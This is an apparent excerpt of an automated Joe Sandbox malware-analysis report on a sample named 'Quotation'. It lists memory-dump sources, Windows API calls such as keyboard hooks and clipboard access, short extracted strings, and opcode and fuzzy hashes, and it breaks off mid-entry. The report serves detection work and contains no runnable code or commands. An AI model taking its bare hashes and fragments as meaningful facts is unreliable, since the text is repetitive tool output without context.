                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3723248A
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294489716.0000000037230000.00000040.00000800.00020000.00000000.sdmp, Offset: 37230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_37230000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: CreateWindow
                                                                • String ID:
                                                                • API String ID: 716092398-0
                                                                • Opcode ID: cee9ac809bf1b1db516bf84cfc91163bc329e10ddba3b5e39ebcbecad30934ba
                                                                • Instruction ID: 518dd5f65b937802e6b7ddf08824cd839cd20aa95965f5ddc0f2896a82c86074
                                                                • Opcode Fuzzy Hash: cee9ac809bf1b1db516bf84cfc91163bc329e10ddba3b5e39ebcbecad30934ba
                                                                • Instruction Fuzzy Hash: 6251D2B1D003099FEB14CF99C984ADEBBF1FF48310F20812AE518AB210D775A845CF91
                                                                APIs
                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3723248A
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294489716.0000000037230000.00000040.00000800.00020000.00000000.sdmp, Offset: 37230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_37230000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: CreateWindow
                                                                • String ID:
                                                                • API String ID: 716092398-0
                                                                • Opcode ID: ea25d3abf3add8aaf14d9787c80c9207f476ef101cc713b603d60bc4b883d9fe
                                                                • Instruction ID: 03e83ab8c18d6c8f23b5bf32b8ba6b6bff6a7c4b0ed0023bbeba8d5434436852
                                                                • Opcode Fuzzy Hash: ea25d3abf3add8aaf14d9787c80c9207f476ef101cc713b603d60bc4b883d9fe
                                                                • Instruction Fuzzy Hash: B741A0B1D01309AFEB14CF99C984ADEBBF5BF48310F64812AE518AB210D775A885CF91
                                                                APIs
                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 37237029
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294489716.0000000037230000.00000040.00000800.00020000.00000000.sdmp, Offset: 37230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_37230000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: CallProcWindow
                                                                • String ID:
                                                                • API String ID: 2714655100-0
                                                                • Opcode ID: 03af0f75325afd2ba00c94b951e13d6463d91dbc76a8be10928680e8569969ab
                                                                • Instruction ID: c0f04bd42b6c2f2527863b6c0cd4b088cf189108761c63b1b7e07784e0788ad8
                                                                • Opcode Fuzzy Hash: 03af0f75325afd2ba00c94b951e13d6463d91dbc76a8be10928680e8569969ab
                                                                • Instruction Fuzzy Hash: B1413AB4A00705DFEB04CF99C884AAABBF5FF88314F24845DE519AB321D775A841CFA1
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294489716.0000000037230000.00000040.00000800.00020000.00000000.sdmp, Offset: 37230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_37230000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Clipboard
                                                                • String ID:
                                                                • API String ID: 220874293-0
                                                                • Opcode ID: c729dc85428a2eb86c6c27581b2ee9d76e1652df63ee2a1f88977bf69d36fa0a
                                                                • Instruction ID: dd0daa7693e7eb853f7afd322d28ad4be2f452687224c0ff5e20bad710db4a05
                                                                • Opcode Fuzzy Hash: c729dc85428a2eb86c6c27581b2ee9d76e1652df63ee2a1f88977bf69d36fa0a
                                                                • Instruction Fuzzy Hash: B93111B0D01249DFEB10CF99C984BDEBBF5AF49314F208069E404AB394DB74A945CFA5
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294489716.0000000037230000.00000040.00000800.00020000.00000000.sdmp, Offset: 37230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_37230000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Clipboard
                                                                • String ID:
                                                                • API String ID: 220874293-0
                                                                • Opcode ID: e3c04e4914cc0ed24525b98006b38da885698ce93729de926222c209f197b1ea
                                                                • Instruction ID: 6519fa45fe7e93dd1b4820e61ee1463af8c7c4060ea4001721a5a724544bc4ad
                                                                • Opcode Fuzzy Hash: e3c04e4914cc0ed24525b98006b38da885698ce93729de926222c209f197b1ea
                                                                • Instruction Fuzzy Hash: FF31FFB0D02609DFEB14CF99C984BDEBBF5AF49314F208069E404AB394DB74A945CFA5
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37236157
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294489716.0000000037230000.00000040.00000800.00020000.00000000.sdmp, Offset: 37230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_37230000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: e9d2b694a3ab18abdedd35758b35843995b9b760063e697afed9a825cf3b241f
                                                                • Instruction ID: 1cfbe7534f892b8658b6ef0f4b04636112b3f69dec363422b4f5b394f4da827b
                                                                • Opcode Fuzzy Hash: e9d2b694a3ab18abdedd35758b35843995b9b760063e697afed9a825cf3b241f
                                                                • Instruction Fuzzy Hash: 0221E7B5900249AFDB10CF9AD584ADEFFF8EB49310F14845AE954A7311C374A944CF61
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37236157
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294489716.0000000037230000.00000040.00000800.00020000.00000000.sdmp, Offset: 37230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_37230000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: 5a92a1a102860b7d650373c2cd67a30b1cfc50c37e59c62563a35cc9d761dab0
                                                                • Instruction ID: a84355ab2d955dd6f510010780935d00be864e67cb067ea7fb98c441281a1373
                                                                • Opcode Fuzzy Hash: 5a92a1a102860b7d650373c2cd67a30b1cfc50c37e59c62563a35cc9d761dab0
                                                                • Instruction Fuzzy Hash: F921C6B59012499FDB10CF9AD584ADEFBF8EB48310F14841AE958A3310D378A944CFA5
                                                                APIs
                                                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 3723986B
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294489716.0000000037230000.00000040.00000800.00020000.00000000.sdmp, Offset: 37230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_37230000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: HookWindows
                                                                • String ID:
                                                                • API String ID: 2559412058-0
                                                                • Opcode ID: bbbe6dcf9fe37c52ff0f4ea8b053266bdf95365c15425709f02b07d1d80f74f8
                                                                • Instruction ID: 0e85147963238b7452859953030a3491286ed5b914c69f07d6a5960bc0056a98
                                                                • Opcode Fuzzy Hash: bbbe6dcf9fe37c52ff0f4ea8b053266bdf95365c15425709f02b07d1d80f74f8
                                                                • Instruction Fuzzy Hash: 7E2134B5D002099FCB04CFAAC844BEEFBF5EF89324F10842AE458A7250C774A941CFA1
                                                                APIs
                                                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 3723986B
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294489716.0000000037230000.00000040.00000800.00020000.00000000.sdmp, Offset: 37230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_37230000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: HookWindows
                                                                • String ID:
                                                                • API String ID: 2559412058-0
                                                                • Opcode ID: 74931b4a11bed974ae281ac464a9fa6c5767b1600dfb40c0549c127c6c0121a5
                                                                • Instruction ID: 781000416604d0084a9980b6084da164720786bf97ac98e4937a42b5c67a72e5
                                                                • Opcode Fuzzy Hash: 74931b4a11bed974ae281ac464a9fa6c5767b1600dfb40c0549c127c6c0121a5
                                                                • Instruction Fuzzy Hash: 942102B5D002099FDB04DF9AC944BEEFBF5AF89324F10842AE458A7250C774A940CFA1
                                                                APIs
                                                                • OleInitialize.OLE32(00000000), ref: 37237BBD
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294489716.0000000037230000.00000040.00000800.00020000.00000000.sdmp, Offset: 37230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_37230000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Initialize
                                                                • String ID:
                                                                • API String ID: 2538663250-0
                                                                • Opcode ID: eca00226ae2fe97b31dc2a89970d8be91f08497e9260d7330ef2caf3cf229b36
                                                                • Instruction ID: a45957e8202058089c7d1168dfbbc891c11472787dbf31f7cddbdde63ba27786
                                                                • Opcode Fuzzy Hash: eca00226ae2fe97b31dc2a89970d8be91f08497e9260d7330ef2caf3cf229b36
                                                                • Instruction Fuzzy Hash: E31100B59007488FDB20DF9AD584B9EBBF5EB48320F20845AD558A7300D378A944CFA5
                                                                APIs
                                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,37237275), ref: 372372FF
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294489716.0000000037230000.00000040.00000800.00020000.00000000.sdmp, Offset: 37230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_37230000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: CallbackDispatcherUser
                                                                • String ID:
                                                                • API String ID: 2492992576-0
                                                                • Opcode ID: a50ea66e88a7e7160d5e3f45eed939fabc5bd92885b57e61bbf566dd73017cf4
                                                                • Instruction ID: d7fed25a7934e28f05c9d79d1a0e700ad6212dd21171f0c443fb962e10ad8d5c
                                                                • Opcode Fuzzy Hash: a50ea66e88a7e7160d5e3f45eed939fabc5bd92885b57e61bbf566dd73017cf4
                                                                • Instruction Fuzzy Hash: D911F2B59006498FDB10DF9AC585BDEBBF4EB49324F20845AE918A7300D778A944CFA5
                                                                APIs
                                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,37237275), ref: 372372FF
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294489716.0000000037230000.00000040.00000800.00020000.00000000.sdmp, Offset: 37230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_37230000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: CallbackDispatcherUser
                                                                • String ID:
                                                                • API String ID: 2492992576-0
                                                                • Opcode ID: 0e75a06e307d4f9fc6db070a95e023c41b2163506bbf7cf17dab5bcee8da5e74
                                                                • Instruction ID: 82b89b0a79388d74b2ef40e2e71d1a742dbb98ee1718572ba5cf6089c6a32f37
                                                                • Opcode Fuzzy Hash: 0e75a06e307d4f9fc6db070a95e023c41b2163506bbf7cf17dab5bcee8da5e74
                                                                • Instruction Fuzzy Hash: 811100B58002498FDB10DF9AC584BDEFBF4EF49324F20845AD958A7300D779A984CFA5
                                                                APIs
                                                                • OleInitialize.OLE32(00000000), ref: 37237BBD
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294489716.0000000037230000.00000040.00000800.00020000.00000000.sdmp, Offset: 37230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_37230000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Initialize
                                                                • String ID:
                                                                • API String ID: 2538663250-0
                                                                • Opcode ID: 7b315cb5b22fbdbdef4c05e9f4bc04f608e089beeea48b12fb8e965f0908dcd9
                                                                • Instruction ID: d68f49bb95c992fe1978b0c2e0f408a68c9a773941d6c2f20806398e22cb2fa2
                                                                • Opcode Fuzzy Hash: 7b315cb5b22fbdbdef4c05e9f4bc04f608e089beeea48b12fb8e965f0908dcd9
                                                                • Instruction Fuzzy Hash: F81100B59006498FDB10DFAAD584BDEFBF5AB49320F20845AD558A3300D378A584CFA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR]q
                                                                • API String ID: 0-3081347316
                                                                • Opcode ID: b376ea8ba1e6ac6dd988af248d8cc9842ed93d44110ee68e33a73ae957dc5af2
                                                                • Instruction ID: 3486e06b4c0dedfeaedf0e7a42f04cf3eecd04532ae5367008f8a56b2481a210
                                                                • Opcode Fuzzy Hash: b376ea8ba1e6ac6dd988af248d8cc9842ed93d44110ee68e33a73ae957dc5af2
                                                                • Instruction Fuzzy Hash: 0B619C34704204CFDB14DB68D459AAE7BF6EF89701F204069E816EF3A1CB75AC45CBA1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR]q
                                                                • API String ID: 0-3081347316
                                                                • Opcode ID: 7ec93f57b5878e6351c302521c312d0da247c2aa7ac97019605f63716979b97d
                                                                • Instruction ID: e92bf4f19dfdc9ba6bd430ca4e079b67d7539ef47103b9cbf1304fb97adfe9e0
                                                                • Opcode Fuzzy Hash: 7ec93f57b5878e6351c302521c312d0da247c2aa7ac97019605f63716979b97d
                                                                • Instruction Fuzzy Hash: 2441B230E14309CFDB15CF68D456AAEB7B2EF8A301F104559E815EF290EB749C4ACB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR]q
                                                                • API String ID: 0-3081347316
                                                                • Opcode ID: fb7b1874fad0536f89d29bd05d8912a05b4518595d6a7983476b56b353e974be
                                                                • Instruction ID: 98b198ff05d5c3cc2f0d3d2b52fc5f7e426cab4cd9b6f1749e35c5598f5cbea3
                                                                • Opcode Fuzzy Hash: fb7b1874fad0536f89d29bd05d8912a05b4518595d6a7983476b56b353e974be
                                                                • Instruction Fuzzy Hash: 0B319E30E14309CFDB15CFA4D45669EB7B2EF8A701F208469E812EB290EB74AC46CB51
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: XPbq
                                                                • API String ID: 0-864591470
                                                                • Opcode ID: 1ff19f392b0d6080df63cc28e2b836672fb196c7a1ed36d3cd97273f0f7da6de
                                                                • Instruction ID: 07879b264ea27ba55ccec2acfd8754042884e696c9c959de780f54be1d52e4e3
                                                                • Opcode Fuzzy Hash: 1ff19f392b0d6080df63cc28e2b836672fb196c7a1ed36d3cd97273f0f7da6de
                                                                • Instruction Fuzzy Hash: 9A415D70E002099FEB549FA5C854B9EBBF6EF88700F21852AE105AB395DB758C068F91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH]q
                                                                • API String ID: 0-3168235125
                                                                • Opcode ID: d836347e0a811c90c5eb4290f1174509fce34b29fba053fca229c87d6d48646f
                                                                • Instruction ID: e4b54a4ad73bc4e98e6475472965ed4fcaecb20ccefb4066ebf80842697853a6
                                                                • Opcode Fuzzy Hash: d836347e0a811c90c5eb4290f1174509fce34b29fba053fca229c87d6d48646f
                                                                • Instruction Fuzzy Hash: B441F374E0030ADFEF04DF65C89069EBBB6EF89340F21492AD501E7648DB74E846CBA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH]q
                                                                • API String ID: 0-3168235125
                                                                • Opcode ID: d1b1677e05e8914a1c235713910e369d1a6a09481f97b1efb38b3b0fccb83603
                                                                • Instruction ID: f820372a2922aeaeab43a1305ef6a223ae58dbbc98b84b87ed0807a13751c13f
                                                                • Opcode Fuzzy Hash: d1b1677e05e8914a1c235713910e369d1a6a09481f97b1efb38b3b0fccb83603
                                                                • Instruction Fuzzy Hash: C331EE34B102058FEB08AB74C86469E7BE2EF89340F214568D506DB395DF39DD4ACB99
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH]q
                                                                • API String ID: 0-3168235125
                                                                • Opcode ID: 7fc89a82de3e568b4cf6f9a08b8b5001dcfe22f2ca96a57c2e8639f8cd2949b0
                                                                • Instruction ID: 2421d64029d831d54de4c54374809f589e4f962b0a29c549653a185834ed5756
                                                                • Opcode Fuzzy Hash: 7fc89a82de3e568b4cf6f9a08b8b5001dcfe22f2ca96a57c2e8639f8cd2949b0
                                                                • Instruction Fuzzy Hash: AA31CD34B102058FEB08AB74C8646AE7AE6EF89240F214538D506DB395DF39DD4ACB99
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR]q
                                                                • API String ID: 0-3081347316
                                                                • Opcode ID: 8a1ac59fd342774f959f3e84c9f99b6190e5418776c2df304eddee5778b696fe
                                                                • Instruction ID: 910438d0947564a5e638b1fa4256280c6c9b57c28b4ab5e905ee0d94d9b04aeb
                                                                • Opcode Fuzzy Hash: 8a1ac59fd342774f959f3e84c9f99b6190e5418776c2df304eddee5778b696fe
                                                                • Instruction Fuzzy Hash: F8319031E04309CBDB15CFA4D44279EB7B2EF85301F20856AE816FB280EB70AC46CB51
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: U
                                                                • API String ID: 0-3372436214
                                                                • Opcode ID: e908a8244d8844a37385cb2c2d6237476938e5d1785294fd7b1645bb46c89684
                                                                • Instruction ID: 80e1e032d070d4ead7d7d03f3010268ae32d967be5db1d6ae529245f27e3c9dc
                                                                • Opcode Fuzzy Hash: e908a8244d8844a37385cb2c2d6237476938e5d1785294fd7b1645bb46c89684
                                                                • Instruction Fuzzy Hash: 2B41FEB1900348DFDB14DFA9C584ADEBFF5FF49310F248029E819AB254DB75A949CB90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q
                                                                • API String ID: 0-1259897404
                                                                • Opcode ID: e4b315b4d9699431b865b766f25322795f9b0eef41eb6be7a327158e8705f4b6
                                                                • Instruction ID: 1bfb1fd15efe6aa7fe058452cabff33d02b56ec31cf9286ec8e36a33788cf574
                                                                • Opcode Fuzzy Hash: e4b315b4d9699431b865b766f25322795f9b0eef41eb6be7a327158e8705f4b6
                                                                • Instruction Fuzzy Hash: 33315E31A406019FC719EB38D551A6A7BEAFFC1312710893CD06A8F665DF75AE0ACB81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q
                                                                • API String ID: 0-1259897404
                                                                • Opcode ID: 22ed1d8c23b01876d2762e8e08cb3e449a7e12691b6eae63bd2b746be06e83b9
                                                                • Instruction ID: fa1232fbdb1a24eca12c31b59f42b30784f5c6121b5b746a23ed283d8abe1713
                                                                • Opcode Fuzzy Hash: 22ed1d8c23b01876d2762e8e08cb3e449a7e12691b6eae63bd2b746be06e83b9
                                                                • Instruction Fuzzy Hash: D6314D30A406019FC719EB38D551A6A7BEAFFC1312710893CD06A8F665DF75EE0ACB81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 6
                                                                • API String ID: 0-498629140
                                                                • Opcode ID: 953f048f2c57a8f814f75321b559139d0aff9519681c53ca7798d02a4f68d384
                                                                • Instruction ID: 5c4b4f74b9abf7b5f122f9e5d12f89bac21040d4725b6744e7336b31136c6c7c
                                                                • Opcode Fuzzy Hash: 953f048f2c57a8f814f75321b559139d0aff9519681c53ca7798d02a4f68d384
                                                                • Instruction Fuzzy Hash: 3F216B34600282DBCB14DF79C54066EB7EAEF54789B108128CD18EB262EB35DD0BCBC6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR]q
                                                                • API String ID: 0-3081347316
                                                                • Opcode ID: 43966629486276f57e1e8d498e7ee18940d4b519ad18b00b446c3a7734fdc78d
                                                                • Instruction ID: 45e962b0f6f1f7dc8b483e3c18df3da6f4dccadcddabdf5f919ceb07230a0d86
                                                                • Opcode Fuzzy Hash: 43966629486276f57e1e8d498e7ee18940d4b519ad18b00b446c3a7734fdc78d
                                                                • Instruction Fuzzy Hash: 552126303042419FC705EF3DD46169A7BA6EF86304F0045AAD489CB39AEF359C4ACBD2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: U
                                                                • API String ID: 0-3372436214
                                                                • Opcode ID: 0c4172bd8b5b6d4c465c5b15598ebf22636bf2bb2f2dd3cc1de9875786df588e
                                                                • Instruction ID: e689e55979792c5aa2dcd37716b8c1b98e66f2f1e5deadf47f4f0f1b5ff8eb3a
                                                                • Opcode Fuzzy Hash: 0c4172bd8b5b6d4c465c5b15598ebf22636bf2bb2f2dd3cc1de9875786df588e
                                                                • Instruction Fuzzy Hash: 7A217C30B00245DFDB15EB68C5657AE77B2AF4930AF200468D916EF7A0EB368D49CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: |
                                                                • API String ID: 0-2343686810
                                                                • Opcode ID: df91dad516575805713b9c854f5feb9ac87149e2ae348ef5ba7cde78f32f0fea
                                                                • Instruction ID: c82ad63d93aeede9e337b7a4510e82e35476884b6924cd8fe9c7240c5871fe8d
                                                                • Opcode Fuzzy Hash: df91dad516575805713b9c854f5feb9ac87149e2ae348ef5ba7cde78f32f0fea
                                                                • Instruction Fuzzy Hash: 1A215C75B00210DFDB54AF78C809AADB7F5AF48750F10846DE54AEB391DB359901CB81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Ko
                                                                • API String ID: 0-716275355
                                                                • Opcode ID: bc9d4ceb663478980c05afc19fadd2a00e9af8e055ce2fac5adc682ed8572422
                                                                • Instruction ID: 727e17b43b92001a9011d6e7f95a5f58f91f2ba2acb713e34b2bd712cbb460c6
                                                                • Opcode Fuzzy Hash: bc9d4ceb663478980c05afc19fadd2a00e9af8e055ce2fac5adc682ed8572422
                                                                • Instruction Fuzzy Hash: 7511E730E00200DFDF169BF5D954B6A7795DF4A316F10487AE866DF251DB24CC8A8BD1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Ko
                                                                • API String ID: 0-716275355
                                                                • Opcode ID: 2fe9324dbfda744afd2a8b4688607ca8f8bb69da6605a3482b69e3240e5b16ab
                                                                • Instruction ID: 575516638e1d701a9ef6213f46e974743d3d836c15d98b031a62b13860c451ba
                                                                • Opcode Fuzzy Hash: 2fe9324dbfda744afd2a8b4688607ca8f8bb69da6605a3482b69e3240e5b16ab
                                                                • Instruction Fuzzy Hash: 9A11C430F00204CFDF55AAF9D544B2D3295EF89316F104939D826DF265DB24CC8A8BD0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: |
                                                                • API String ID: 0-2343686810
                                                                • Opcode ID: 5dce5dfce43223a878d8adb8f54b1351585a8bb25f1d062d8110b4335dac6b15
                                                                • Instruction ID: ded5915f56bab425a7d134a870da75fec2cf934d48b4affb0de7d65ab2dc59c1
                                                                • Opcode Fuzzy Hash: 5dce5dfce43223a878d8adb8f54b1351585a8bb25f1d062d8110b4335dac6b15
                                                                • Instruction Fuzzy Hash: 12114974F40224DFDB44DB78C804B6E77F6AF48710F10846AE91AEB3A4DB3599018B84
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \I6
                                                                • API String ID: 0-110914427
                                                                • Opcode ID: 008a1218a5e7f60993e7e3b344133433fe836a647685d4d1378679caf57592f4
                                                                • Instruction ID: 22806fa1bf6ae26cc6975dce3d8e316145d01d61a16542c10d778be42b760c1e
                                                                • Opcode Fuzzy Hash: 008a1218a5e7f60993e7e3b344133433fe836a647685d4d1378679caf57592f4
                                                                • Instruction Fuzzy Hash: 80E08C303156509FC7056B78A8165997BF9EF8B65036004AEE486CF2A3CE515C099B92
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \I6
                                                                • API String ID: 0-110914427
                                                                • Opcode ID: 631711ec949df832c67aa33cd049d239aea0d1b792b3f2c21a32467691f41f24
                                                                • Instruction ID: b9cbdbed887b39dee50ac8af02e438204882f3abb70da0ecbfbed6c04da14c00
                                                                • Opcode Fuzzy Hash: 631711ec949df832c67aa33cd049d239aea0d1b792b3f2c21a32467691f41f24
                                                                • Instruction Fuzzy Hash: 1FD05E317900249B8608B26CA4528AA36E9DFCA712750057AFA09CF362CE519C095785
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
